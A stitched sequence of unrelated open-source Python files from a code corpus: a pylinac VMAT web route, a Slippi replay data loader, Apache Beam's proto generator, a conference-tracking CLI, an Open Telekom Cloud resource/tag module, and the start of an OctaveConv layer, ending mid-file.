"acquisition_datetime": acquisition_datetime
}
# Generate pylinac report:
if pdf_report_enable == "True":
pdf_file = tempfile.NamedTemporaryFile(delete=False, prefix="VMAT", suffix=".pdf", dir=config.PDF_REPORT_FOLDER)
myvmat.publish_pdf(pdf_file)
variables["pdf_report_filename"] = os.path.basename(pdf_file.name)
general_functions.delete_files_in_subfolders([temp_folder1, temp_folder2]) # Delete image
return template("vmat_results", variables)
@vmat_app.route('/vvmat/<w1>/<w2>/<testtype>', method="POST")
def vvmat_calculate(w1, w2, testtype):
imgdescription = request.forms.hidden_imgdescription
station = request.forms.hidden_station
displayname = request.forms.hidden_displayname
acquisition_datetime = request.forms.hidden_datetime
args = {"w1": w1, "w2": w2, "testtype": testtype, "imgdescription": imgdescription,
"station": station, "displayname": displayname, "acquisition_datetime": acquisition_datetime,
"config": general_functions.get_configuration()}
p = Pool(1)
data = p.map(vmat_helperf_catch_error, [args])
p.close()
p.join()
return data
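# --- Editor's hedged usage sketch (not part of the original module) ---
# `vmat_app` is a Bottle sub-application; the surrounding server presumably
# combines it with the other QA modules, e.g. either of:
#
#   root_app.merge(vmat_app)           # copy its routes into a root Bottle app
#   root_app.mount('/vmat', vmat_app)  # or serve it under a URL prefix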
| 39.2 | 132 | 0.685897 |
93ad718a419912709307979bcc1d7642105608e5 | 8,377 | py | Python | slippi_ai/data.py | supersteph/slippi-ai | 97e0845789e95c1511295bad626a514fff46ce74 | ["MIT"] | 12 | 2020-11-11T06:39:23.000Z | 2022-02-26T04:55:31.000Z | slippi_ai/data.py | supersteph/slippi-ai | 97e0845789e95c1511295bad626a514fff46ce74 | ["MIT"] | 5 | 2020-11-26T18:17:17.000Z | 2022-02-07T16:48:34.000Z | slippi_ai/data.py | supersteph/slippi-ai | 97e0845789e95c1511295bad626a514fff46ce74 | ["MIT"] | 9 | 2020-11-15T18:24:47.000Z | 2022-01-15T18:00:18.000Z |
import atexit
import itertools
import multiprocessing as mp
import os
import pickle
import random
from typing import Any, Iterable, List, Optional, Sequence, Set, Tuple, Iterator, NamedTuple
import zlib
import numpy as np
import tree
import melee
from slippi_ai import embed, reward, stats, utils
Nest = Any
Controller = Nest
Game = Nest
class CompressedGame(NamedTuple):
states: Game
counts: Sequence[int]
rewards: Sequence[float]
class Batch(NamedTuple):
game: CompressedGame
needs_reset: bool
def train_test_split(data_dir, subset=None, test_ratio=.1):
if subset:
print("Using subset:", subset)
filenames = stats.get_subset(subset)
filenames = [name + '.pkl' for name in filenames]
else:
print("Using all replays in", data_dir)
filenames = sorted(os.listdir(data_dir))
print(f"Found {len(filenames)} replays.")
# reproducible train/test split
rng = random.Random()
rng.shuffle(filenames)
test_files = rng.sample(filenames, int(test_ratio * len(filenames)))
test_set = set(test_files)
train_files = [f for f in filenames if f not in test_set]
train_paths = [os.path.join(data_dir, f) for f in train_files]
test_paths = [os.path.join(data_dir, f) for f in test_files]
if not test_paths:
test_paths = train_paths
return train_paths, test_paths
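# --- Editor's hedged usage sketch (not part of the original module) ---
#   train_paths, test_paths = train_test_split('replays/', test_ratio=0.1)
# Note: random.Random() above is created without an explicit seed, so the
# shuffle (and therefore the split) differs between interpreter runs.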
def game_len(game: CompressedGame):
return len(game.counts)
class TrajectoryManager:
# TODO: manage recurrent state? can also do it in the learner
def __init__(self, source: Iterator[CompressedGame]):
self.source = source
self.game: CompressedGame = None
def find_game(self, n):
while True:
game = next(self.source)
if game_len(game) >= n: break
self.game = game
self.frame = 0
def grab_chunk(self, n) -> Tuple[CompressedGame, bool]:
# TODO: write a unit test for this
needs_reset = self.game is None or game_len(self.game) - self.frame < n
if needs_reset:
self.find_game(n)
new_frame = self.frame + n
slice = lambda a: a[self.frame:new_frame]
chunk = tree.map_structure(slice, self.game)
self.frame = new_frame
return Batch(chunk, needs_reset)
def swap_players(game: Game) -> Game:
old_players = game['player']
new_players = {1: old_players[2], 2: old_players[1]}
new_game = game.copy()
new_game['player'] = new_players
return new_game
def detect_repeated_actions(controllers: Nest) -> Sequence[bool]:
"""Labels actions as repeated or not.
Args:
controllers: A nest of numpy arrays with shape [T].
Returns:
A boolean numpy array `repeats` with shape [T-1].
repeats[i] is True iff controllers[i+1] equals controllers[i]
"""
is_same = lambda a: a[:-1] == a[1:]
repeats = tree.map_structure(is_same, controllers)
repeats = np.stack(tree.flatten(repeats), -1)
repeats = np.all(repeats, -1)
return repeats
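# Editor's hedged illustration (not in the original): with
# controllers = {'x': np.array([1, 1, 2])}, detect_repeated_actions returns
# array([ True, False]) -- frame 1 repeats frame 0, frame 2 does not.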
def indices_and_counts(
repeats: Sequence[bool],
max_repeat=15,
) -> Tuple[Sequence[int], Sequence[int]]:
"""Finds the indices and counts of repeated actions.
`repeats` is meant to be produced by `detect_repeated_actions`
If `controllers` is [a, a, a, c, b, b], then
repeats = [T, T, F, F, T]
indices = [2, 3, 5]
counts = [2, 0, 1]
Args:
repeats: A boolean array with shape [T-1].
max_repeat: Maximum number of consecutive repeated actions before a repeat
is considered a non-repeat.
Returns:
A tuple (indices, counts).
"""
indices = []
counts = []
count = 0
for i, is_repeat in enumerate(repeats):
if not is_repeat or count == max_repeat:
indices.append(i) # index of the last repeated action
counts.append(count)
count = 0
else:
count += 1
indices.append(len(repeats))
counts.append(count)
return np.array(indices), np.array(counts)
def compress_repeated_actions(
game: Game,
rewards: Sequence[float],
embed_controller: embed.Embedding,
max_repeat: int,
) -> CompressedGame:
controllers = game['player'][1]['controller_state']
controllers = embed_controller.map(lambda e, a: e.preprocess(a), controllers)
repeats = detect_repeated_actions(controllers)
indices, counts = indices_and_counts(repeats, max_repeat)
compressed_game = tree.map_structure(lambda a: a[indices], game)
reward_indices = np.concatenate([[0], indices[:-1]])
compressed_rewards = np.add.reduceat(rewards, reward_indices)
compressed_game = CompressedGame(compressed_game, counts, compressed_rewards)
shapes = [x.shape for x in tree.flatten(compressed_game)]
for s in shapes:
assert s == shapes[0]
return compressed_game
def _charset(chars: Optional[Iterable[melee.Character]]) -> Set[int]:
if chars is None:
chars = list(melee.Character)
return set(c.value for c in chars)
class DataSource:
def __init__(
self,
filenames,
compressed=True,
batch_size=64,
unroll_length=64,
max_action_repeat=15,
# preprocesses (discretizes) actions before repeat detection
embed_controller=None,
# Lists of melee.Character. None means all allowed.
allowed_characters=None,
allowed_opponents=None,
):
self.filenames = filenames
self.batch_size = batch_size
self.unroll_length = unroll_length
self.compressed = compressed
self.max_action_repeat = max_action_repeat
self.embed_controller = embed_controller
trajectories = self.produce_trajectories()
self.managers = [
TrajectoryManager(trajectories)
for _ in range(batch_size)]
self.allowed_characters = _charset(allowed_characters)
self.allowed_opponents = _charset(allowed_opponents)
def produce_trajectories(self) -> Iterator[CompressedGame]:
raw_games = self.produce_raw_games()
allowed_games = filter(self.is_allowed, raw_games)
processed_games = map(self.process_game, allowed_games)
return processed_games
def process_game(self, game: Game) -> CompressedGame:
rewards = reward.compute_rewards(game)
return compress_repeated_actions(
game, rewards, self.embed_controller, self.max_action_repeat)
def produce_raw_games(self) -> Iterator[Game]:
"""Raw games without post-processing."""
self.file_counter = 0
for path in itertools.cycle(self.filenames):
self.file_counter += 1
with open(path, 'rb') as f:
obj_bytes = f.read()
if self.compressed:
obj_bytes = zlib.decompress(obj_bytes)
game = pickle.loads(obj_bytes)
yield game
yield swap_players(game)
def is_allowed(self, game: Game) -> bool:
return (
game['player'][1]['character'][0] in self.allowed_characters
and
game['player'][2]['character'][0] in self.allowed_opponents)
def __next__(self) -> Tuple[Batch, float]:
next_batch = utils.batch_nest(
[m.grab_chunk(self.unroll_length) for m in self.managers])
epoch = self.file_counter / len(self.filenames)
return next_batch, epoch
def produce_batches(data_source_kwargs, batch_queue):
data_source = DataSource(**data_source_kwargs)
while True:
batch_queue.put(next(data_source))
class DataSourceMP:
def __init__(self, buffer=4, **kwargs):
for k, v in kwargs.items():
setattr(self, k, v)
self.batch_queue = mp.Queue(buffer)
self.process = mp.Process(
target=produce_batches, args=(kwargs, self.batch_queue))
self.process.start()
atexit.register(self.batch_queue.close)
atexit.register(self.process.terminate)
def __next__(self) -> Tuple[Batch, float]:
return self.batch_queue.get()
_name_to_character = {c.name.lower(): c for c in melee.Character}
def _chars_from_string(chars: str) -> List[melee.Character]:
if chars == 'all':
return list(melee.Character)
chars = chars.split(',')
return [_name_to_character[c] for c in chars]
CONFIG = dict(
batch_size=32,
unroll_length=64,
compressed=True,
max_action_repeat=15,
in_parallel=True,
# comma-separated lists of characters, or "all"
allowed_characters='all',
allowed_opponents='all',
)
def make_source(
allowed_characters: str,
allowed_opponents: str,
in_parallel: bool,
**kwargs):
constructor = DataSourceMP if in_parallel else DataSource
return constructor(
allowed_characters=_chars_from_string(allowed_characters),
allowed_opponents=_chars_from_string(allowed_opponents),
**kwargs)
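# --- Editor's hedged usage sketch (not part of the original module) ---
# A data source is typically assembled from the defaults above, e.g.:
#
#   source = make_source(filenames=train_paths,
#                        embed_controller=my_controller_embedding,  # hypothetical
#                        **CONFIG)
#   batch, epoch = next(source)   # batch.game, batch.needs_reset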
| 29.600707 | 92 | 0.701922 |
59d6cb7fe1c2e0697da77ed684195fa971ed4549 | 5,109 | py | Python | sdks/python/gen_protos.py | Sil1991/gcpdf-demo | 88ecd538a30f009b239a1b320ab6ad75f6901ae0 | ["Apache-2.0"] | 1 | 2018-04-14T15:56:19.000Z | 2018-04-14T15:56:19.000Z | sdks/python/gen_protos.py | Sil1991/gcpdf-demo | 88ecd538a30f009b239a1b320ab6ad75f6901ae0 | ["Apache-2.0"] | 13 | 2019-11-13T03:56:36.000Z | 2021-12-14T21:12:07.000Z | sdks/python/gen_protos.py | Sil1991/gcpdf-demo | 88ecd538a30f009b239a1b320ab6ad75f6901ae0 | ["Apache-2.0"] | null | null | null |
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Generates Python proto modules and grpc stubs for Beam protos."""
import glob
import logging
import multiprocessing
import os
import pkg_resources
import shutil
import subprocess
import sys
import time
import warnings
GRPC_TOOLS = 'grpcio-tools>=1.3.5'
BEAM_PROTO_PATHS = [
os.path.join('..', '..', 'model', 'pipeline', 'src', 'main', 'proto'),
os.path.join('..', '..', 'model', 'job-management', 'src', 'main', 'proto'),
os.path.join('..', '..', 'model', 'fn-execution', 'src', 'main', 'proto'),
]
PYTHON_OUTPUT_PATH = os.path.join('apache_beam', 'portability', 'api')
def generate_proto_files(force=False):
try:
import grpc_tools
except ImportError:
warnings.warn('Installing grpcio-tools is recommended for development.')
py_sdk_root = os.path.dirname(os.path.abspath(__file__))
common = os.path.join(py_sdk_root, '..', 'common')
proto_dirs = [os.path.join(py_sdk_root, path) for path in BEAM_PROTO_PATHS]
proto_files = sum(
[glob.glob(os.path.join(d, '*.proto')) for d in proto_dirs], [])
out_dir = os.path.join(py_sdk_root, PYTHON_OUTPUT_PATH)
out_files = [path for path in glob.glob(os.path.join(out_dir, '*_pb2.py'))]
if out_files and not proto_files and not force:
# We have out_files but no protos; assume they're up to date.
# This is actually the common case (e.g. installation from an sdist).
logging.info('No proto files; using existing generated files.')
return
elif not out_files and not proto_files:
if not os.path.exists(common):
raise RuntimeError(
'Not in apache git tree; unable to find proto definitions.')
else:
raise RuntimeError(
'No proto files found in %s.' % proto_dirs)
# Regenerate iff the proto files are newer.
elif force or not out_files or len(out_files) < len(proto_files) or (
min(os.path.getmtime(path) for path in out_files)
<= max(os.path.getmtime(path) for path in proto_files)):
try:
from grpc_tools import protoc
except ImportError:
# Use a subprocess to avoid messing with this process' path and imports.
# Note that this requires a separate module from setup.py for Windows:
# https://docs.python.org/2/library/multiprocessing.html#windows
p = multiprocessing.Process(
target=_install_grpcio_tools_and_generate_proto_files)
p.start()
p.join()
if p.exitcode:
raise ValueError("Proto generation failed (see log for details).")
else:
logging.info('Regenerating out-of-date Python proto definitions.')
builtin_protos = pkg_resources.resource_filename('grpc_tools', '_proto')
args = (
[sys.executable] + # expecting to be called from command line
['--proto_path=%s' % builtin_protos] +
['--proto_path=%s' % d for d in proto_dirs] +
['--python_out=%s' % out_dir] +
# TODO(robertwb): Remove the prefix once it's the default.
['--grpc_python_out=grpc_2_0:%s' % out_dir] +
proto_files)
ret_code = protoc.main(args)
if ret_code:
raise RuntimeError(
'Protoc returned non-zero status (see logs for details): '
'%s' % ret_code)
# Though wheels are available for grpcio-tools, setup_requires uses
# easy_install which doesn't understand them. This means that it is
# compiled from scratch (which is expensive as it compiles the full
# protoc compiler). Instead, we attempt to install a wheel in a temporary
# directory and add it to the path as needed.
# See https://github.com/pypa/setuptools/issues/377
def _install_grpcio_tools_and_generate_proto_files():
install_path = os.path.join(
os.path.dirname(os.path.abspath(__file__)), '.eggs', 'grpcio-wheels')
build_path = install_path + '-build'
if os.path.exists(build_path):
shutil.rmtree(build_path)
logging.warning('Installing grpcio-tools into %s' % install_path)
try:
start = time.time()
subprocess.check_call(
['pip', 'install', '--target', install_path, '--build', build_path,
'--upgrade', GRPC_TOOLS])
logging.warning(
'Installing grpcio-tools took %0.2f seconds.' % (time.time() - start))
finally:
shutil.rmtree(build_path)
sys.path.append(install_path)
generate_proto_files()
if __name__ == '__main__':
generate_proto_files(force=True)
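# --- Editor's note (hedged, not part of the original script) ---
# Running `python gen_protos.py` forces regeneration via
# generate_proto_files(force=True); when called without force (e.g. from the
# package build), it only regenerates when the .proto sources are newer than
# the generated *_pb2.py modules.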
| 38.126866 | 78 | 0.695831 |
be4f1cb0b7d7607159fd3b7ea853d4ce0b3a4003 | 10,268 | py | Python | conrad/cli.py | ca-pettarelli/conrad | ff8edaa2f3053d6bababff883946067e3469635a | ["Apache-2.0"] | null | null | null | conrad/cli.py | ca-pettarelli/conrad | ff8edaa2f3053d6bababff883946067e3469635a | ["Apache-2.0"] | null | null | null | conrad/cli.py | ca-pettarelli/conrad | ff8edaa2f3053d6bababff883946067e3469635a | ["Apache-2.0"] | null | null | null |
# -*- coding: utf-8 -*-
import os
import json
import hashlib
import datetime as dt
import click
import requests
import sqlalchemy
from colorama import Fore, Style
from cli_helpers import tabular_output
from . import __version__, CONRAD_HOME
from .db import engine, Session
from .models import Base, Event, Reminder
from .utils import initialize_database, validate
def set_default_pager():
os_environ_pager = os.environ.get("PAGER")
if os_environ_pager == "less":
os.environ["LESS"] = "-SRXF"
def get_events():
response = requests.get(
"https://raw.githubusercontent.com/vinayak-mehta/conrad/master/data/events.json"
)
with open(os.path.join(CONRAD_HOME, "events.json"), "w") as f:
f.write(json.dumps(response.json()))
def refresh_database(events):
session = Session()
for event in events:
event_id = hashlib.md5(
(event["name"] + event["start_date"]).encode("utf-8")
).hexdigest()
e = Event(
id=event_id[:6],
name=event["name"],
url=event["url"],
city=event["city"],
state=event["state"],
country=event["country"],
cfp_open=event["cfp_open"],
cfp_start_date=dt.datetime.strptime(event["cfp_start_date"], "%Y-%m-%d"),
cfp_end_date=dt.datetime.strptime(event["cfp_end_date"], "%Y-%m-%d"),
start_date=dt.datetime.strptime(event["start_date"], "%Y-%m-%d"),
end_date=dt.datetime.strptime(event["end_date"], "%Y-%m-%d"),
source=event["source"],
tags=event["tags"],
kind=event["kind"],
)
session.add(e)
session.commit()
session.close()
@click.group(name="conrad")
@click.version_option(version=__version__)
@click.pass_context
def cli(ctx, *args, **kwargs):
"""conrad: Track conferences and meetups on your terminal!"""
set_default_pager()
@cli.command("refresh", short_help="Refresh event database.")
@click.confirmation_option(prompt="Would you like conrad to look for new events?")
@click.pass_context
def _refresh(ctx, *args, **kwargs):
if not os.path.exists(CONRAD_HOME):
os.makedirs(CONRAD_HOME)
get_events()
if not os.path.exists(os.path.join(CONRAD_HOME, "conrad.db")):
initialize_database()
else:
Event.__table__.drop(engine)
Base.metadata.tables["event"].create(bind=engine)
with open(os.path.join(CONRAD_HOME, "events.json"), "r") as f:
events = json.load(f)
refresh_database(events)
# TODO: print("10 new events found!")
click.echo("Event database updated!")
@cli.command("show", short_help="Show all saved events.")
@click.option(
"--cfp",
"-c",
is_flag=True,
help="Show only events which have an open CFP (call for proposals).",
)
@click.option(
"--tag", "-t", default="", help="Look at conferences with a specific tag."
)
@click.option(
"--name",
"-n",
default="",
help="Look at conferences containing a specific word in their name.",
)
@click.option(
"--location",
"-l",
default="",
help="Look at conferences in a specific city, state or country.",
)
@click.option(
"--date",
"-d",
default=[],
multiple=True,
help='Look at conferences based on when they\'re happening. For example: conrad show --date ">= 2019-10-01" --date "<= 2020-01-01".',
)
@click.pass_context
def _show(ctx, *args, **kwargs):
# TODO: conrad show --new
if not os.path.exists(CONRAD_HOME):
os.makedirs(CONRAD_HOME)
if not os.path.exists(os.path.join(CONRAD_HOME, "conrad.db")):
click.echo("Event database not found, fetching it!")
get_events()
initialize_database()
with open(os.path.join(CONRAD_HOME, "events.json"), "r") as f:
events = json.load(f)
refresh_database(events)
cfp = kwargs["cfp"]
tag = kwargs["tag"]
name = kwargs["name"]
date = list(kwargs["date"])
location = kwargs["location"]
filters = []
if cfp:
filters.append(Event.cfp_open.is_(cfp))
if tag:
filters.append(Event.tags.contains(tag))
if name:
filters.append(Event.name.ilike("%{}%".format(name)))
if date:
date_filters = []
for d in date:
            op, date_value = d.split(" ")  # e.g. ">= 2019-10-01"
            if not (">" in op or "<" in op):
                raise click.UsageError("Wrong comparison operator!")
            try:
                __ = dt.datetime.strptime(date_value, "%Y-%m-%d")
            except ValueError:
                raise click.UsageError("Wrong date format!")
            if ">" in op:
                date_filters.append(Event.start_date >= date_value)
            elif "<" in op:
                date_filters.append(Event.start_date <= date_value)
filters.append(sqlalchemy.and_(*date_filters))
if location:
filters.append(
sqlalchemy.or_(
Event.city.ilike("%{}%".format(location)),
Event.state.ilike("%{}%".format(location)),
Event.country.ilike("%{}%".format(location)),
)
)
session = Session()
events = list(
session.query(Event).filter(*filters).order_by(Event.start_date).all()
)
if len(events):
header = [
"id",
"name",
"url",
"city",
"state",
"country",
"start_date",
"end_date",
]
events_output = []
for event in events:
events_output.append(
[
event.id,
event.name,
event.url,
event.city,
event.state,
event.country,
event.start_date.strftime("%Y-%m-%d"),
event.end_date.strftime("%Y-%m-%d"),
]
)
session.close()
formatted = tabular_output.format_output(
events_output, header, format_name="ascii"
)
click.echo_via_pager("\n".join(formatted))
else:
click.echo("No events found!")
@cli.command("remind", short_help="Set and display reminders.")
@click.option("--id", "-i", default=None, help="Conference identifier.")
@click.pass_context
def _remind(ctx, *args, **kwargs):
_id = kwargs["id"]
if _id is None:
session = Session()
reminders = list(
session.query(Event, Reminder)
.filter(Event.id == Reminder.id)
.order_by(Event.start_date)
.all()
)
if len(reminders):
header = ["id", "name", "start_date", "days_left"]
reminders_output = []
for reminder, __ in reminders:
start = dt.datetime.now()
if reminder.cfp_open:
delta_days = (reminder.cfp_end_date - start).days
days_left = "{} days left to cfp deadline!".format(delta_days)
else:
delta_days = (reminder.start_date - start).days
days_left = "{} days left!".format(delta_days)
if delta_days > 30:
days_left = Fore.GREEN + Style.BRIGHT + days_left + Style.RESET_ALL
elif delta_days < 30 and delta_days > 10:
days_left = Fore.YELLOW + Style.BRIGHT + days_left + Style.RESET_ALL
elif delta_days < 10:
days_left = Fore.RED + Style.BRIGHT + days_left + Style.RESET_ALL
reminders_output.append(
[
reminder.id,
reminder.name,
reminder.start_date.strftime("%Y-%m-%d"),
days_left,
]
)
session.close()
formatted = tabular_output.format_output(
reminders_output, header, format_name="ascii"
)
click.echo("\n".join(formatted))
else:
click.echo("No reminders found!")
else:
try:
session = Session()
reminder = Reminder(id=_id)
session.add(reminder)
session.commit()
session.close()
click.echo("Reminder set!")
except sqlalchemy.exc.IntegrityError:
session.rollback()
if click.confirm("Do you want to remove this reminder?"):
session = Session()
session.query(Reminder).filter(Reminder.id == _id).delete()
session.commit()
session.close()
click.echo("Reminder removed!")
@cli.command("import", short_help="Import new events into conrad.")
@click.option("--file", "-f", default=None, help="JSON file to import.")
@click.pass_context
def _import(ctx, *args, **kwargs):
file = kwargs["file"]
EVENTS_PATH = os.path.join(os.getcwd(), "data", "events.json")
if file is None:
raise click.UsageError("No file provided!")
if not os.path.exists(file):
raise click.UsageError("File does not exist!")
with open(file, "r") as f:
input_events = json.load(f)
failures = validate(input_events)
if len(failures):
raise click.UsageError(
"The following validations failed!\n{}".format(
"".join(
list(map(lambda x: "- " + x + "\n", failures[:-1]))
+ list(map(lambda x: "- " + x, failures[-1:]))
)
)
)
with open(EVENTS_PATH, "r") as f:
events = json.load(f)
new_events = []
for ie in input_events:
match = False
for e in events:
if (
ie["name"].replace(" ", "").lower()
in e["name"].replace(" ", "").lower()
):
click.echo("Updating {}".format(e["name"]))
e.update(ie)
match = True
if not match:
new_events.append(ie)
events.extend(new_events)
click.echo("Added {} new events!".format(len(new_events)))
with open(EVENTS_PATH, "w") as f:
f.write(json.dumps(events, indent=4, sort_keys=True))
| 31.304878 | 137 | 0.546552 |
3c7ce3c8de69dd9451104db562f1c93cd29b3eac
| 8,961 |
py
|
Python
|
opentelekom/otc_resource.py
|
tsdicloud/python-opentelekom-sdk
|
809f3796dba48ad0535990caf7519bb9afa71d2d
|
[
"Apache-2.0"
] | null | null | null |
opentelekom/otc_resource.py
|
tsdicloud/python-opentelekom-sdk
|
809f3796dba48ad0535990caf7519bb9afa71d2d
|
[
"Apache-2.0"
] | null | null | null |
opentelekom/otc_resource.py
|
tsdicloud/python-opentelekom-sdk
|
809f3796dba48ad0535990caf7519bb9afa71d2d
|
[
"Apache-2.0"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import re
from openstack import resource
from openstack import exceptions
from openstack import utils
def filter_none(d):
if isinstance(d, dict):
return { k: filter_none(v) for k, v in d.items() if v is not None }
elif isinstance(d, list):
return [ filter_none(elem) for elem in d ]
else:
return d
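# Editor's hedged illustration (not in the original): filter_none drops None
# values from (nested) dicts but keeps list elements, e.g.
#   filter_none({'a': None, 'b': {'c': 1, 'd': None}}) == {'b': {'c': 1}}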
class OtcResource(resource.Resource):
# ===== adaptions of standard methods for OTC
def fetch(self, session, requires_id=True,
base_path=None, error_message=None, **params):
""" Open Telekom Cloud sometimes throws an Bad Request exception.although a
NotFound is required to make find or fetch working
"""
try:
return super().fetch(session=session, requires_id=requires_id,
base_path=base_path, error_message=error_message, **params)
except exceptions.BadRequestException as bad:
raise exceptions.ResourceNotFound(details=bad.details, http_status=404, request_id=bad.request_id)
def _prepare_request(self, requires_id=None, prepend_key=False,
patch=False, base_path=None):
""" Enhance requets preparation by None value elimination """
request = super()._prepare_request(requires_id=requires_id, prepend_key=prepend_key,
patch=patch, base_path=base_path)
request.body = filter_none(request.body)
return request
def _translate_response(self, response, has_body=None, error_message=None):
""" Open Telekom has non-uniform formats for error details,
so we try to adapt the different formats to get useful information out of exceptions """
isError = False
if has_body is None:
has_body = self.has_body
if has_body:
content_type = response.headers.get('content-type', '')
if response.content and 'application/json' in content_type:
oerror = response.json()
emsg = ""
# Normalize to dict if error is described as a sub-structure
if "error" in oerror:
isError = True
oerror = oerror['error']
# first: extract some known code/value pairs
if "code" in oerror:
isError = True
emsg += "[" + str(oerror['code']) + "]"
if "message" in oerror:
emsg += " " + oerror['message'] + "\n"
else:
emsg += "\n"
if "error_code" in oerror:
isError = True
if "error_msg" in oerror:
emsg += " " + oerror['error_msg'] + "\n"
else:
emsg += "\n"
if "errorCode" in oerror:
isError = True
emsg += "[" + oerror['errorCode'] + "]"
if "message" in oerror:
emsg += " " + oerror['message'] + "\n"
else:
emsg += "\n"
# second: collect reasons in case of error so as not to lose information
if isError:
for reason, msg in oerror.items():
if reason not in ['code', 'error_code', 'errorCode', 'message', 'error_msg']:
emsg += reason + "=" + msg + '\n'
super()._translate_response(response, has_body=has_body, error_message=emsg if isError else None)
#==== additional convenience functions here =====
#==== OpenTelekom Cloud usage of sub-resources to have cleaner APIs ====
class OtcSubResource(resource.Resource):
""" This is an extension for Open Telekom Cloud so that sub-dicts could be defined with
resource fields for better documentation and type control """
def to_dict(self, body=True, headers=False, computed=True,
ignore_none=True, **params):
""" Just redefine behavior of to_dict to ignore Nones """
return super().to_dict(body=body, headers=headers, computed=computed,
ignore_none=ignore_none, **params)
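# Hedged sketch (added; the class and field names are illustrative, not part of this SDK):
# a sub-resource is declared with ordinary resource.Body fields and then embedded as the
# type of a field on an OtcResource, for example:
#
#   class BackupPolicy(OtcSubResource):
#       keep_days = resource.Body('keep_days', type=int)
#       start_time = resource.Body('start_time')
#
#   class Share(OtcResource):
#       backup_policy = resource.Body('backup_policy', type=BackupPolicy)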
#==== OpenTelekom Cloud key/value extended tag handling ====
class TagMixin(object):
#: A list of associated tags
#: *Type: list of tag strings*
tags = resource.Body('tags', type=dict, default={})
_key_syntax = re.compile(r'^[0-9a-zA-Z_\-]{1,36}$')
_value_syntax = re.compile(r'^[0-9a-zA-Z_\-]{0,43}$')
def _checkOtcTagSyntax(self, key, value):
if TagMixin._key_syntax.match(key) is None:
raise exceptions.InvalidRequest(
'Key %s should have 1..36 characters a-zA-Z0-9_-' % key)
if TagMixin._value_syntax.match(value) is None:
raise exceptions.InvalidRequest(
'Value %s should have at most 43 characters a-zA-Z0-9_-' % value)
def _fetch(self, session):
url = utils.urljoin(self.base_path, self.id, 'tags')
session = self._get_session(session)
response = session.get(url)
exceptions.raise_from_response(response)
json = response.json()
tags = {}
if 'tags' in json:
for t in json['tags']:
tags[ t['key'] ] = t['value']
self._body.attributes.update({'tags': tags })
return response
def fetch_tags(self, session):
"""Lists tags set on the entity.
:param session: The session to use for making this request.
:return: The list with tags attached to the entity
"""
# NOTE(gtema): since this is a common method
# we can't rely on the resource_key, because tags are returned
# without resource_key. Do parse response here
self._fetch(session)
return self
def check_tag(self, session, key):
"""Checks if tag exists on the entity.
If the tag does not exist a 404 will be returned
:param session: The session to use for making this request.
:param tag: The tag as a string.
"""
response = self._fetch(session)
if key not in self.tags:
exceptions.raise_from_response(response,
error_message='Tag does not exist')
return self
def add_tag(self, session, key, value):
"""Adds a single key,value tag to the resource.
:param session: The session to use for making this request.
:param key: The tag key as a string.
:param value: The tag value as a string.
"""
self._checkOtcTagSyntax(key, value)
url = utils.urljoin(self.base_path, self.id, 'tags')
session = self._get_session(session)
response = session.post(url=url, json={ "tag": { "key": key, "value": value }})
exceptions.raise_from_response(response)
# we do not want to update tags directly
tags = self.tags
tags[key] = value
self._body.attributes.update({
'tags': tags
})
return self
def remove_tag(self, session, key):
url = utils.urljoin(self.base_path, self.id, 'tags', key)
session = self._get_session(session)
response = session.delete(url=url)
exceptions.raise_from_response(response)
# we do not want to update tags directly
tags = self.tags
del tags[key]
self._body.attributes.update({
'tags': tags
})
return self
def remove_all_tags(self, session):
"""Removes all tags on the entity.
:param session: The session to use for making this request.
"""
self.fetch_tags(session)
keys = list(self.tags.keys())
for key in keys:
self.remove_tag(session, key)
return self
def set_tags(self, session, tags={}):
"""Sets/Replaces all tags on the resource.
:param session: The session to use for making this request.
:param dict tags: Dict with the tags to be set on the resource
"""
if len(tags)>10:
raise exceptions.InvalidRequest('Not more than 10 tags allowed!')
for key,value in tags.items():
self._checkOtcTagSyntax(key,value)
self.remove_all_tags(session)
for key,value in dict(tags).items():
self.add_tag(session, key, value)
return self
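# Hedged usage sketch (added; the resource class and values are illustrative only):
#
#   class Vpc(OtcResource, TagMixin):
#       base_path = '/vpcs'
#
#   vpc = Vpc.existing(id='<vpc-id>')
#   vpc.set_tags(session, {'env': 'dev', 'owner': 'team-a'})  # replaces all tags, max. 10
#   vpc.add_tag(session, 'stage', 'blue')                     # key <= 36 chars, value <= 43 chars
#   vpc.remove_all_tags(session)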
| 38.625 | 110 | 0.58989 |
b0e95ac292fccb6ebc137c193e42b6a88688fc12
| 10,940 |
py
|
Python
|
layers/OctaveConv1.py
|
IlikeBB/Object-Detection-for-M-NBI
|
650fa1ca7b8860785f0a838dab0301a9cba121d6
|
[
"MIT"
] | 633 |
2019-04-16T16:18:45.000Z
|
2022-03-17T13:39:47.000Z
|
libs/nn/OctaveConv1.py
|
m-and-ms/OctaveConv_pytorch
|
ef971222da74802d61ff2e401e5dcafc4e9233bb
|
[
"MIT"
] | 26 |
2019-04-17T18:26:01.000Z
|
2020-05-29T12:09:26.000Z
|
libs/nn/OctaveConv1.py
|
m-and-ms/OctaveConv_pytorch
|
ef971222da74802d61ff2e401e5dcafc4e9233bb
|
[
"MIT"
] | 99 |
2019-04-17T01:34:28.000Z
|
2021-02-23T02:01:04.000Z
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Author: Xiangtai Li(lxtpku@pku.edu.cn)
# Pytorch Implementation of Octave Conv Operation
# This version uses F.conv2d with learnable sampled weights
import torch
import torch.nn as nn
import torch.nn.functional as F
up_kwargs = {'mode': 'nearest'}
class OctaveConv(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, alpha_in=0.5, alpha_out=0.5, stride=1, padding=1, dilation=1,
groups=1, bias=False, up_kwargs = up_kwargs):
super(OctaveConv, self).__init__()
